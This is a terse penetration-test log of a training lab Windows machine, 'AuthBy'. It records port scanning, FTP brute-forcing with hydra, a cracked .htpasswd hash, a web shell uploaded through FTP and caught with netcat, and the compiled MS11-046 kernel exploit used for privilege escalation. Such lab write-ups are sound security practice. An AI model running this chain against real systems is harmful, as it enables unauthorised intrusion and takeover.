🧪 Pentest Log: {{date:2025-08-12}}

🔍 Target Information

• Machine Name: AuthBy
• IP Address: 192.168.199.46
• Operating System: Windows

ip=192.168.199.46

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Anonymous Login

ftp anonymous@$ip

Bruteforce Common Credentials

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -6 ftp://$ip

Obtain credential

admin:admin

Login with credential and retrieve .htpasswd

offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

Crack the password

offsec:elite

Also found we have the ability to upload files

put shell.php

Port 242

Web Directory Scan

gobuster dir -u http://$ip:242 -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip:242 -r -o dirsearch.txt

Login with

offsec:elite

💣 Exploitation / Foothold

📌 Vulnerability Summary

• Service / Port: 242
• Vulnerability Type: RCE

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

https://www.exploit-db.com/exploits/49216

http://192.168.199.46:242/shell.php

nc -lvnp 242

🧬 Privilege Escalation

👤 Current Access

• User: apache
• Groups: N/A
• Shell Type: web shell

🔍 Enumeration

System Info:

systeminfo

found

OS Name:                   Microsoftr Windows Serverr 2008 Standard 
OS Version:                6.0.6001 Service Pack 1 Build 6001

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Kernel Exploit
• Target Binary/Service: N/A
• Reference / Source: ExploitDB

🔧 Exploit Steps

• Setup

searchsploit -m https://www.exploit-db.com/exploits/40564

i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32

• Smash to Administrator

./MS11-046.exe